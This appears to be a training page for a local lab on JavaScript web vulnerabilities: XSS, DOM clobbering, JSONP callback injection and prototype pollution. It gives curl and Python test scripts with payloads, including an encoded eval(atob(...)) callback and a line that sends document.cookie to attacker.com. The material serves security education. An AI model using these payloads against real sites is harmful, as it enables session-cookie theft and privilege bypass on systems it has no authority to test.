CLI JavaScript Security Fundamentals

Master JavaScript vulnerabilities using command-line tools including XSS, DOM clobbering, JSONP, and prototype pollution. Essential skills for web security challenges and modern web exploitation.

Learning Objectives

Understand Cross-Site Scripting (XSS) using CLI tools

Exploit DOM clobbering with command-line analysis

Abuse JSONP for script injection using curl

Use prototype pollution with CLI testing tools

Cross-Site Scripting (XSS)

XSS injects malicious scripts into web pages. Types include:

  • Reflected XSS: Input in URL (e.g., ?q=<script>alert(1)</script>)
  • Stored XSS: Input stored and rendered (e.g., comments)
  • DOM-based XSS: Client-side script manipulates DOM unsafely

DOM Clobbering

Uses HTML elements (e.g., <div id="config">) to overwrite global JavaScript variables, breaking assumptions in code.

JSONP

Loads data via <script> tags with a callback (e.g., callback(data)). Unsanitized callbacks allow arbitrary code execution.

Prototype Pollution

Modifying Object.prototype (e.g., {"__proto__": {"isAdmin": true}}) affects all objects, bypassing checks.

CLI Web Security Tools

curl

Test HTTP requests and responses

nmap

Network scanning and service detection

Node.js

JavaScript runtime for testing

Python

Scripting and automation

Practical Exercise

1. Setup

# Start the Docker container
docker-compose up -d
docker-compose exec sec-env bash

# Navigate to workspace and examine files
cd /workspace
ls -la static/
cat static/example.html
cat static/example.js

2. XSS Testing with curl

# Test reflected XSS
curl "http://localhost:8080/search?q=<script>alert('XSS')</script>"

# Test with URL encoding
curl "http://localhost:8080/search?q=%3Cscript%3Ealert('XSS')%3C/script%3E"

# Test stored XSS
curl -X POST "http://localhost:8080/comment" \
  -d "comment=<script>alert('Stored XSS')</script>" \
  -H "Content-Type: application/x-www-form-urlencoded"

# Test DOM-based XSS
curl "http://localhost:8080/page#<script>alert('DOM XSS')</script>"

XSS Payloads: Test various payloads including <script>, javascript:, and event handlers.

3. DOM Clobbering Analysis

# Create a test HTML file
cat > test_dom_clobber.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
    <title>DOM Clobbering Test</title>
</head>
<body>
    <div id="config">clobbered</div>
    <script>
        console.log(config);  // Should be clobbered
        console.log(window.config);  // Same result
    </script>
</body>
</html>
EOF

# Test with Node.js
node -e "
const jsdom = require('jsdom');
const { JSDOM } = jsdom;
const dom = new JSDOM(\`
<div id='config'>clobbered</div>
<script>console.log(config);</script>
\`);
console.log(dom.window.config);
"

DOM clobbering can be tested by creating HTML elements that overwrite global variables.

4. JSONP Vulnerability Testing

# Test JSONP callback injection
curl "http://localhost:8080/api/data?callback=alert(1)"

# Test with malicious callback
curl "http://localhost:8080/api/data?callback=alert(document.cookie)"

# Test with encoded payload
curl "http://localhost:8080/api/data?callback=eval(atob('YWxlcnQoMSk='))"

# Create a test server for JSONP
python3 -m http.server 8080 &
curl "http://localhost:8080/api?callback=test"
#!/usr/bin/env python3
import requests
import base64

# Test JSONP callback injection
def test_jsonp(url):
    payloads = [
        "alert(1)",
        "alert(document.cookie)",
        "eval(atob('YWxlcnQoMSk='))",  # base64 encoded alert(1)
        "fetch('http://attacker.com?cookie='+document.cookie)"
    ]
    
    for payload in payloads:
        response = requests.get(f"{url}?callback={payload}")
        print(f"Payload: {payload}")
        print(f"Response: {response.text[:100]}...")
        print("-" * 50)

# Test the endpoint
test_jsonp("http://localhost:8080/api/data")

5. Prototype Pollution Testing

# Test prototype pollution with Node.js
node -e "
const obj = {};
console.log('Before:', obj.isAdmin);

// Pollute the prototype
const payload = JSON.parse('{\"__proto__\": {\"isAdmin\": true}}');
Object.assign(obj, payload);

console.log('After:', obj.isAdmin);
console.log('New object:', {}.isAdmin);
"
#!/usr/bin/env python3
import requests
import json

def test_prototype_pollution(url):
    # Test payloads for prototype pollution
    payloads = [
        {"__proto__": {"isAdmin": True}},
        {"constructor": {"prototype": {"isAdmin": True}}},
        {"__proto__": {"polluted": True}},
        {"constructor": {"prototype": {"polluted": True}}}
    ]
    
    for payload in payloads:
        try:
            response = requests.post(url, json=payload)
            print(f"Payload: {json.dumps(payload)}")
            print(f"Status: {response.status_code}")
            print(f"Response: {response.text[:100]}...")
            print("-" * 50)
        except Exception as e:
            print(f"Error with payload {payload}: {e}")

# Test the endpoint
test_prototype_pollution("http://localhost:8080/api/merge")

Practice Exercises

XSS Payloads

Create and test various XSS payloads using curl and Python scripts.

DOM Clobbering

Test DOM clobbering techniques using Node.js and HTML analysis.

JSONP Exploitation

Find and exploit JSONP vulnerabilities in web applications.

Prototype Pollution

Test prototype pollution vulnerabilities in JavaScript applications.

Key Takeaways

curl is essential for testing web vulnerabilities and HTTP requests

Node.js provides a powerful environment for JavaScript security testing

Python scripts automate vulnerability testing and payload generation

Further Reading

curl Documentation

Complete curl manual and examples

Node.js API

Node.js documentation for security testing

OWASP WSTG

Web Security Testing Guide